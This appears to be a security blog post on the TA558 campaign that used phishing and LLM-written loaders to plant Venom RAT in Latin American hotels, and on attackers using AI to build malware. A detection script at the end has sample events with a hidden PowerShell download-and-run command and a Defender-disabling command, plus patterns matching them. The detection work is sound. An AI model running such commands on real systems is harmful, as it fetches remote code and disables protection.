
RAT Venom in Brazilian Hotels

  • Javier Conejo del Cerro
  • 18 Sept
  • 3 min read

The hospitality sector in Latin America has become the latest battlefield for TA558, a threat actor long linked to RevengeHotels. In its newest campaign, the group combined phishing emails in Portuguese and Spanish with LLM-generated scripts to deploy Venom RAT, a Quasar-based malware sold in the cybercriminal market for $650 as a lifetime license. This marks a dangerous evolution: hotels and travel organizations are now facing attackers who blend human-crafted lures with AI-generated code to steal credit card data and business-sensitive information.


Phase 1: Phishing Lures at Reception


The first wave of the campaign began with emails in Portuguese and Spanish disguised as invoices, job applications, or reservation details. These lures targeted front desk, reservation, and finance staff, who frequently handle billing or customer data. By tailoring the content to the hospitality environment, attackers increased the chance that employees would open the message and launch the malicious attachment.


Phase 2: LLM-Crafted Loaders


Instead of traditional Office macros, TA558 used JavaScript loaders launched via WScript, heavily commented and formatted in ways consistent with large language model (LLM)-generated code. These scripts downloaded a PowerShell component, which in turn fetched a second-stage file named cargajecerrr.txt. Once executed, it pulled and ran the loader responsible for deploying the main payload. This AI-aided scripting allowed attackers to scale, automate, and refine their initial infection chain faster than before.


Phase 3: Venom RAT Deployment


The Venom RAT payload was then installed, inheriting its framework from Quasar RAT but with commercial enhancements. Venom RAT is marketed for $650 as a lifetime license, reflecting its popularity in underground forums. Its features included:

  • Persistence through registry keys and re-launch routines.

  • Anti-kill mechanisms: modifying DACLs to prevent termination and killing analysis or admin tools every 50ms.

  • Security tampering: disabling Microsoft Defender and manipulating the Task Scheduler.

  • Spread: propagation via USB drives to reach more hosts.

  • Critical process flagging: if run with admin rights, it could mark itself as a critical system process to survive termination attempts.

This made Venom RAT a resilient tool to steal credentials, sessions, configuration files, and exfiltrate sensitive hotel data.


Phase 4: Harvesting Guests’ Secrets


The group’s ultimate goal was clear: steal credit card data and customer records. By breaching hotel systems tied to Online Travel Agencies (OTAs) such as Booking.com, TA558 was able to capture payment card information from both guests and business partners. Beyond financial data, Venom RAT also harvested staff credentials, system configurations, and sensitive files — everything useful for fraud, resale, or lateral movement inside the compromised networks.


Phase 5: Persistence and Anti-Detection


Venom RAT maintained its foothold with Registry modifications, USB spread, and continuous anti-analysis loops. It could also disable Microsoft Defender Antivirus, ensuring long-term presence. Its ability to exfiltrate data silently while keeping systems operational made detection harder, particularly for understaffed IT teams in hotels. The use of LLM-generated scripts added another challenge: the code looked generic, filled with comments, and lacked typical malware signatures.


The Antidote


The RevengeHotels/TA558 campaign highlights how quickly cybercrime is evolving with AI-enhanced malware chains. Hospitality organizations should:


  • Filter and sandbox emails with reservation/invoice/job themes.

  • Audit and restrict PowerShell and WScript execution.

  • Monitor for LLM-like scripting patterns with excessive comments or boilerplate structures.

  • Deploy EDR solutions capable of detecting process tampering and anti-kill loops.

  • Limit admin privileges and enforce least privilege policies.

  • Train staff regularly to recognize phishing attempts in Portuguese and Spanish.
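As an added example, not code from the original post or from any vendor report, the following Python applies three of these checks (script hosts launched from user-writable folders, PowerShell spawned by WScript with a hidden download cradle, and Defender tampering) to constructed Sysmon-style process-creation events that mimic the WScript -> PowerShell -> cargajecerrr.txt chain described above. The host, user and file paths in the sample events are invented.

```python
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
EXPLORER = r"C:\Windows\explorer.exe"
# Constructed Sysmon-style process-creation events (not real telemetry) that mimic the
# article's WScript -> PowerShell -> cargajecerrr.txt chain plus two benign processes.
SAMPLE_EVENTS = [
    {"pid": 4010, "image": WS, "parent": EXPLORER,
     "cmdline": r'wscript.exe "C:\Users\recepcao\Downloads\fatura_reserva.js"'},
    {"pid": 4022, "image": PS, "parent": WS,
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object "
                "Net.WebClient).DownloadString('http://loader.example/cargajecerrr.txt')\""},
    {"pid": 4031, "image": PS, "parent": PS,
     "cmdline": 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"pid": 5100, "image": WS, "parent": EXPLORER,
     "cmdline": r'wscript.exe "C:\Program Files\HotelPMS\logon.vbs"'},
    {"pid": 5200, "image": PS, "parent": EXPLORER,
     "cmdline": 'powershell.exe -c "Get-Service -Name Spooler"'},
]

# Script file launched from a user-writable location (typical for a phishing attachment).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop)\\|\\Temp\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
# Download cradle primitive combined with a hidden window or execution-policy bypass.
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
EVASIVE = re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy)?p?\s+bypass", re.I)
DEFENDER_TAMPER = re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)  # Defender tampering

def classify(ev):
    """Return the names of the rules that fire on one process-creation event."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    hits = []
    if image.endswith(("wscript.exe", "cscript.exe")) and USER_WRITABLE.search(cmd) and SCRIPT_EXT.search(cmd):
        hits.append("script_host_user_dir")
    if image.endswith("powershell.exe"):
        if parent.endswith(("wscript.exe", "cscript.exe")):
            hits.append("powershell_from_script_host")
        if DOWNLOAD.search(cmd) and EVASIVE.search(cmd):
            hits.append("hidden_download_cradle")
        if DEFENDER_TAMPER.search(cmd):
            hits.append("defender_tamper")
    return hits

def detect_loader_chain(events):
    """Map pid -> rule hits for every event that trips at least one rule."""
    return {ev["pid"]: h for ev in events if (h := classify(ev))}
```

Running `detect_loader_chain(SAMPLE_EVENTS)` flags only the three events of the chain; the PMS logon script and the help-desk Get-Service call pass unflagged.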


The Venom RAT campaign against Brazilian and Spanish-speaking hotels shows how traditional phishing lures are now supercharged by AI-generated scripts, expanding both scale and sophistication. By targeting financial and reservation systems linked to OTAs, TA558 and RevengeHotels highlight the fragility of hospitality supply chains. This incident is a stark reminder that even sectors focused on customer experience must now operate as frontline defenders against advanced cybercrime, where AI is no longer an advantage for the good side alone.


